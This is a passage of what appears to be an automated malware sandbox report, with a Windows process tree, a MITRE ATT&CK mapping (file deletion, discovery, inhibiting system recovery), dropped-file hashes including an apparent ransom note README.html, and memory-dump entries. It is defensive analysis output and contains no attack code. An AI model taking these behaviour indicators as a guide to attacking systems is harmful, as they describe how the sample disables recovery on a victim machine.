        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
        5⤵
        
        PID:5036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        5⤵
        
        PID:2528
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
        5⤵
        
        PID:468
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
        5⤵
        
        PID:3504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
        5⤵
        
        PID:4304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        5⤵
        
        PID:1328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1428 /prefetch:1
        5⤵
        
        PID:1356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1
        5⤵
        
        PID:2708

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57dc28.rbs

Filesize
7KB

MD5
0a62f3bd45e0b69b447fcfa8f583eb28

SHA1
4aacb4263cb5d1e9c26bff11396ab0c61c63c4fb

SHA256
246d58185c402ce3579454cb302f31a7b6223e48ec9c5978d19a2cb391ad9292

SHA512
03c38020b5c93cf3398f50eb04976ebd370bb666a76bb71beea81d33ec2c768118240205f95cedb136a0eea489422694bb1c8455b57b42e1ee8227f271a2beb9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_0427E0C422552175D60EE73B40A150E1

Filesize
746B

MD5
5eeae6a173a3a20298464ab0a1f157fb

SHA1
32d3cda80f3286875ecd56ccf0f530440d0a2778

SHA256
eb8583c4df6b8686c5f814f45286e0e6b3c4be1b8d183aa44a3a2fcc0f143fb3

SHA512
d399ccc562644bccebaf25bfb59b302820f2111897f3b4bcc1182c25cf322000c42522935787ae800d645af9241a3325631ee573b3619e9a4e0bd65485321624

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Filesize
727B

MD5
8ed407c1efb115cb83ed645288bfa6a9

SHA1
02fd0aefeacc842ee04a21d376313ba5ee74e2b4

SHA256
ab74d98b1b0c0806cb4552e410bed694b64f9d4ffc5ae1744f26da0899657576

SHA512
df6374c17c778839291d58ae9a2ff3d5d9b552dd138658d91ea2e7fbdd617b5445571bd8ab5540de2332555f1a9e06171f9b33ce4fa759a9218f94b4d644b80d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0427E0C422552175D60EE73B40A150E1

Filesize
404B

MD5
eab75dd06e2252df87db43bb6063595d

SHA1
344c78f1f56f255e3f0a0f3717629209e31d9a80

SHA256
3b9137f00821b68e73d664f445e7ba1bd389a16093dabfba033a18c289dc906c

SHA512
3e2cf5910e8da90190b21afce303919bcc7b197f70d8c4b73d1eada7f7def1a519fceed25de3a96248ea95d2af0022ddbcefc6f7ec7fc8553f9774e49e353d89

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Filesize
412B

MD5
de9fae58dbddf1766227d15beade836b

SHA1
bb4034e6ded07f56e21fd08df043239fff8af6f8

SHA256
d61fea355ed064c9fe1d2835f45e0ab3bcd7d98f3c2e7e11af2d194e26bbf7a8

SHA512
f9408c6342ac2a318bcad3832329ba8c1d7a5ebc3842ed38661e814e7f203661498bef759ece6c74cdd31331f07fbf54cf0343ea17cbc7ae7106b2c80009b2f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
048656f46cbeec431fc9211b492b0210

SHA1
472e28d665f77507f42fd6d4373d69efe4817fb6

SHA256
b70bedb089a51bc48a6d94fdc9a44db7310d8ab1d5f17c0592e438a42efff050

SHA512
ab8a2e36fb6fa2afb017f26c1e15249f4d76ae7fef0a5c6142d50b11072242d2fc74bec1ee0c7973a4ec3b3109c3e26a7b48b778343208644dcf806b74572c2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
68ccc6da0895e184d5c5a4404a000332

SHA1
555c621274589aba41bbacf634fa8d36367063c7

SHA256
5edcda6fd3b488d6297eb94956ff4fb3c3fbae6b5b31f2b69955997535224048

SHA512
7799a448723ecfc240660fdef67b9e933270ec56f7c30c5d7a86e21c4549f636cd2084e061e1796ec7bb9a037c853775df1546317a36f13a4223318f3c06e47a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1408e6b6e93959f157b837d04b41389f

SHA1
57b6e43945caf0ab13ac1b8dd12a982cd60e6100

SHA256
5e5e74683553f59b1f6fc941c14dec08408c98214d2c73060f59c375053c4251

SHA512
93d2a426f448de3fa023281027dbe5306788b8570b698d2dc71bf8144b4787ac69e7e8bedd8c810255d32d3dab138e99f4447be5036f1073796ae9f7f0c9770b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
b2cf4d0049ace39b74eef79a55294004

SHA1
d7c3ca52a379d2e60352e30270360f961bbb2ec0

SHA256
f09ecec25a5a6280529f91f243579b90dff160b1432b685455031fd1dc4c4f6f

SHA512
75dbba4e152552da37f9f7b5b8655c7034c070db3bdbc3c4ec20bc5e509c420df86f6f5ef0126ca21b3eb73fee1ca93d1b555896a51a95e806655de491dcbc16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d9d27ee065344ce1242da5f9aebefacf

SHA1
61aae9cbe487f8c02a748816ccd5f931b3eb2aea

SHA256
4f515f88646b20151eafe915df2218db76aea3e4252111569d09f512eabe70b6

SHA512
9281b6e7b3fbcfbe49e6f26aaa5b38d8763a3800dd35c1f51028a906e27534ef4dd69a5e7fe5ee1fa9bc33f33504b81163a23d0298eab036e3f08e349ac95d5c

Download Submit
C:\Users\Admin\Pictures\README.html

Filesize
15KB

MD5
8c736fff43fa2133856de646113d6521

SHA1
1e9eadf5ffd6a7c6d5384ae1958c9ecb16d84889

SHA256
644701dd5a2be1ec0b4c86fc3b6497e5e5a5920dbdaf7aa413142f857d085a09

SHA512
da308e56e344064e2aa3847b48e9f6547f0fe10026f5d77a4a82dc94be511b122480a94c7f629e2b6f10d1fa65e54d2bd9fee7ba72d1ba7c811d938aec12cb14

Download Submit
C:\Users\Public\ap8vy5rv60fe

Filesize
1KB

MD5
11a6d5c607f94dbe41b8e736c245c7b4

SHA1
1f47b20623f71e2d9c4021ddcb1b0ba849daf480

SHA256
c824550141718082909afc4ffb16cd73017f1a53b056242370f35ebe614ea224

SHA512
3a6d159f088c3db58bd00fab6d820b61bdc51bb32bb530fc0c7741d3784b5ba994c21cefe62e932195e1a40d0c6a125d7167d47abba08c776e7eaf90397a1be4

Download Submit
C:\Users\Public\ap8vy5rv60fe

Filesize
1KB

MD5
11a6d5c607f94dbe41b8e736c245c7b4

SHA1
1f47b20623f71e2d9c4021ddcb1b0ba849daf480

SHA256
c824550141718082909afc4ffb16cd73017f1a53b056242370f35ebe614ea224

SHA512
3a6d159f088c3db58bd00fab6d820b61bdc51bb32bb530fc0c7741d3784b5ba994c21cefe62e932195e1a40d0c6a125d7167d47abba08c776e7eaf90397a1be4

Download Submit
C:\Users\Public\ap8vy5rv60fe

Filesize
1KB

MD5
11a6d5c607f94dbe41b8e736c245c7b4

SHA1
1f47b20623f71e2d9c4021ddcb1b0ba849daf480

SHA256
c824550141718082909afc4ffb16cd73017f1a53b056242370f35ebe614ea224

SHA512
3a6d159f088c3db58bd00fab6d820b61bdc51bb32bb530fc0c7741d3784b5ba994c21cefe62e932195e1a40d0c6a125d7167d47abba08c776e7eaf90397a1be4

Download Submit
C:\Users\Public\uop119e3wl

Filesize
4KB

MD5
ce7ebcfa05f061a337a4300bf7888be1

SHA1
1ec3b231c251d1ac3b8a7b89a0f01615e9d4432b

SHA256
74e94565179a09d17101d64868d33d4d4d7b7bd2864a90c796b2914f950a1a6c

SHA512
4a9d89dc6c19f3b0a00f671e15e84254e9576a411eccf323826b3c6e767b3296857103813ad7110445234829e709a5c0821dbe7f47689c89028245feb828537a

Download Submit
C:\Users\Public\uop119e3wl

Filesize
4KB

MD5
ce7ebcfa05f061a337a4300bf7888be1

SHA1
1ec3b231c251d1ac3b8a7b89a0f01615e9d4432b

SHA256
74e94565179a09d17101d64868d33d4d4d7b7bd2864a90c796b2914f950a1a6c

SHA512
4a9d89dc6c19f3b0a00f671e15e84254e9576a411eccf323826b3c6e767b3296857103813ad7110445234829e709a5c0821dbe7f47689c89028245feb828537a

Download Submit
C:\Users\Public\uop119e3wl

Filesize
4KB

MD5
ce7ebcfa05f061a337a4300bf7888be1

SHA1
1ec3b231c251d1ac3b8a7b89a0f01615e9d4432b

SHA256
74e94565179a09d17101d64868d33d4d4d7b7bd2864a90c796b2914f950a1a6c

SHA512
4a9d89dc6c19f3b0a00f671e15e84254e9576a411eccf323826b3c6e767b3296857103813ad7110445234829e709a5c0821dbe7f47689c89028245feb828537a

Download Submit
C:\Windows\Installer\MSIDD50.tmp

Filesize
53KB

MD5
b1b419f1d12b690013e7946efb733bd8

SHA1
93bc125eefb3daca36dc8014214c7c3d788d443c

SHA256
a1c5c0b2f1bc8e40a6e59c5d66876a031a593287e939ca6f79486ef8f68e34fb

SHA512
66bf4cd551a47c8c0ca30a0d1366ac034d8a6b99caaf880daaff01d23b445e4257f4776904270619a1e072bcbba37aef0c245dc2fae9f412614f92bd7e1f3af6

Download Submit
C:\Windows\Installer\MSIDD50.tmp

Filesize
53KB

MD5
b1b419f1d12b690013e7946efb733bd8

SHA1
93bc125eefb3daca36dc8014214c7c3d788d443c

SHA256
a1c5c0b2f1bc8e40a6e59c5d66876a031a593287e939ca6f79486ef8f68e34fb

SHA512
66bf4cd551a47c8c0ca30a0d1366ac034d8a6b99caaf880daaff01d23b445e4257f4776904270619a1e072bcbba37aef0c245dc2fae9f412614f92bd7e1f3af6

Download Submit
C:\Windows\Installer\e57dc27.msi

Filesize
96KB

MD5
6c120194a2f94ef993950e55bd00108b

SHA1
670b20bf3be343efec6a162c3fc5443c9ec0f367

SHA256
48b9a931b49c1b20ec23f182246b937265e735937c2d798f9f2fee557018b629

SHA512
b4976bd4ba4bc3092ac924cbd7423e27a73aa926282f3fa36ba14892defec5e8fec2f6460fbcbb03ee4b7831610d45dd7290dd12ab61a8ce24911f51879494ae

Download Submit
\??\Volume{48958a02-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c74fef3a-f1dd-4f47-96d9-8ee9c23e7c4b}_OnDiskSnapshotProp

Filesize
5KB

MD5
53aadfdccd9c5eda2db971748941a97c

SHA1
fa048f104673f593fd8eca4ca7d682c8f7e2e7d0

SHA256
7ea138bfde46d07fef3110e3745cb333338942898b1880bc24eaa83feb746e64

SHA512
ae1f0209ab3a92979ba22f6bde54959457307bd31fcf56bea6c162eeba2a72b94710e51eeaa01069f30bab3a8c4b6ccbe3ab9ceebe2e5e0d17d419492b8482ae

Download Submit
memory/840-60-0x000001BEA8000000-0x000001BEA8001000-memory.dmp

Filesize
4KB

Download
memory/840-35-0x000001BEA7E20000-0x000001BEA7E21000-memory.dmp

Filesize
4KB

Download
memory/840-54-0x000001BEA7FF0000-0x000001BEA7FF1000-memory.dmp

Filesize
4KB

Download
memory/840-61-0x000001BEA8090000-0x000001BEA8091000-memory.dmp

Filesize
4KB

Download
memory/840-62-0x000001BEA80A0000-0x000001BEA80A1000-memory.dmp

Filesize
4KB

Download
memory/840-69-0x000001BEA8910000-0x000001BEA8911000-memory.dmp

Filesize
4KB

Download
memory/840-101-0x000001BEA8970000-0x000001BEA8971000-memory.dmp

Filesize
4KB

Download
memory/840-76-0x000001BEA8A30000-0x000001BEA8A31000-memory.dmp

Filesize
4KB

Download
memory/840-23-0x000001BEA7AB0000-0x000001BEA7ABC000-memory.dmp

Filesize
48KB

Download
memory/840-142-0x000001BEA7E40000-0x000001BEA7E41000-memory.dmp

Filesize
4KB

Download
memory/840-158-0x000001BEA7E50000-0x000001BEA7E51000-memory.dmp

Filesize
4KB

Download
memory/840-28-0x000001BEA7AC0000-0x000001BEA7AC1000-memory.dmp

Filesize
4KB

Download
memory/840-25-0x000001BEA7AD0000-0x000001BEA7AD1000-memory.dmp

Filesize
4KB

Download
memory/840-31-0x000001BEA7DE0000-0x000001BEA7DE1000-memory.dmp

Filesize
4KB

Download
memory/840-32-0x000001BEA7DF0000-0x000001BEA7DF1000-memory.dmp

Filesize
4KB

Download
memory/840-29-0x000001BEA7B00000-0x000001BEA7B01000-memory.dmp

Filesize
4KB

Download
memory/840-30-0x000001BEA7DD0000-0x000001BEA7DD1000-memory.dmp

Filesize
4KB

Download
memory/840-39-0x000001BEA7E30000-0x000001BEA7E31000-memory.dmp

Filesize
4KB

Download
memory/2496-24-0x000002BAD5CC0000-0x000002BAD5CC3000-memory.dmp

Filesize
12KB

Download
memory/2496-52-0x000002BAD5CF0000-0x000002BAD5CF1000-memory.dmp

Filesize
4KB

Download
memory/2496-41-0x000002BAD5CD0000-0x000002BAD5CD1000-memory.dmp

Filesize
4KB

Download
memory/2496-46-0x000002BAD5CE0000-0x000002BAD5CE1000-memory.dmp

Filesize
4KB

Download
memory/2512-120-0x0000029972CC0000-0x0000029972CC1000-memory.dmp

Filesize
4KB

Download